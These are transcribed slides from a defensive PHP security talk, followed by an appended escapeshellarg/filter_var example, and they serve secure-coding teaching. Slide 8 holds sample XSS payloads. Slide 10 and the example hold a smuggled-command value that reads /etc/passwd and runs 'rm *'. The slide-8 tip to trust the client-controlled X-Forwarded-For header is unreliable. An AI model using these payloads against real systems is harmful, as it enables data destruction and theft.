Php Security


Published on

presentation given by uttam in PHPCamp
Published in: Technology
Transcript

  • 1. PHP Security by Uttam Kumar. Email: [email_address], Mobile: 9730791715
  • 2. What is Security?
    • measurement…
    • safety…
    • protection…
  • 3. Secure Web Applications
    • web security issues have to do with:
      • hacker attacks
        • denial of service
        • server hijacking
      • common threats
      • compromise of data
  • 4. PHP & Security
    • a growing language…
    • a major concern…
  • 5. Never trust the web…
    • Input data validation
      • register_globals = OFF
      • $_REQUEST[] is a big NO NO…
      • Type-cast input data
        • No is_numeric() if the data is numeric [locale problem]
        • Regular expression if the data is a string
      • Path validation
        • Always use basename()
  • 6. Never trust the web…
    • Content size validation
      • Use server-side max length validation
      • File upload
        • Check the uploaded file's size with $_FILES['name']['size']
        • I think the browser MIME header is reliable, right?
          • Use getimagesize() in case of an image
        • External source upload, like an avatar
          • Make a local copy if path/of/file is submitted from a URL.
  • 7. XSS attack
      • Can lead to embarrassment.
      • Session take-over.
      • Password theft.
      • User tracking by 3rd parties
  • 8. XSS attack
    • Prevention is better than cure
      • Use strip_tags()
        • Allow no tags, please
      • Use htmlentities()
      • Is $_SERVER safe?
        • It can be set…
        • Php.php/%22%3E%3Cscript%3Ealert('xss')%3c/script%3E%3cfoo
        • $_SERVER['PATH_INFO'] = /"><script>alert('xss')</script><foo;
        • $_SERVER['PHP_SELF'] = /php.php/"><script>alert('xss')</script><foo
      • IP-based info
        • Use HTTP_X_FORWARDED_FOR
        • Use long2ip()
          • $aIp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
          • $sValidIp = long2ip(ip2long(array_pop($aIp)));
  • 9. SQL Injection WWW
      • Arbitrary query execution
      • Removal of data.
      • Modification of existing values.
      • Denial of service.
      • Arbitrary data injection.
  • 10. Calling External Programs
    • Sometimes you need to call external programs (using system(), exec(), popen(), passthru(), or the back-tick operator). This is extremely dangerous if the program name or any of its arguments is based on user input. Instead use escapeshellarg() or escapeshellcmd() so that users can't trick the system into executing arbitrary commands.
    • <?php $fp = popen('/usr/sbin/sendmail -i ' . $to, 'w'); ?>
    • The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A
    • which would result in running the command: /usr/sbin/sendmail -i evil@evil.org < /etc/passwd; rm *
    • A solution would be: $fp = popen('/usr/sbin/sendmail -i ' . escapeshellarg($to), 'w');
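A worked version of the fix on slide 10, added here as an example and not taken from the slides: the recipient is validated with filter_var() before it gets anywhere near the shell, and is then passed through escapeshellarg() so it reaches sendmail as exactly one quoted argument. The function names safeRecipientArg() and sendViaSendmail() are assumptions made for this example.

```php
<?php
// Added example (not from the slides): the sendmail call from slide 10,
// with the user-supplied recipient validated and then shell-escaped.
// Function names below are assumptions made for this example.

/**
 * Return the recipient as ONE quoted shell argument, or null if it is not a
 * syntactically valid e-mail address.
 */
function safeRecipientArg(string $to): ?string
{
    // Validate first: reject anything that is not a well-formed address,
    // rather than trying to clean a bad value up.
    if (filter_var($to, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // Defence in depth: escapeshellarg() wraps the value in single quotes and
    // escapes embedded quotes, so the shell sees exactly one argument and
    // metacharacters such as ';', '<' or '*' cannot end the command.
    return escapeshellarg($to);
}

/** Pipe $body to sendmail for $to; returns false on invalid input or failure. */
function sendViaSendmail(string $to, string $body): bool
{
    $arg = safeRecipientArg($to);
    if ($arg === null) {
        return false;
    }
    $fp = popen('/usr/sbin/sendmail -i ' . $arg, 'w');
    if ($fp === false) {
        return false;
    }
    fwrite($fp, $body);
    return pclose($fp) === 0;
}

// Constructed inputs: a normal address, and the payload quoted on slide 10
// (after URL decoding). The second one never reaches popen().
$inputs = [
    'alice@example.com',
    'evil@evil.org < /passwd; rm *',
];
foreach ($inputs as $in) {
    $arg = safeRecipientArg($in);
    echo str_pad($in, 32) . ' => ' . ($arg ?? 'REJECTED') . PHP_EOL;
}
```

Validation and escaping are independent layers: the whitelist rejects the slide's payload outright, and escapeshellarg() would still neutralise it if a future change loosened the whitelist.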
  • 11. Questions…????
  • 12. Thank You !!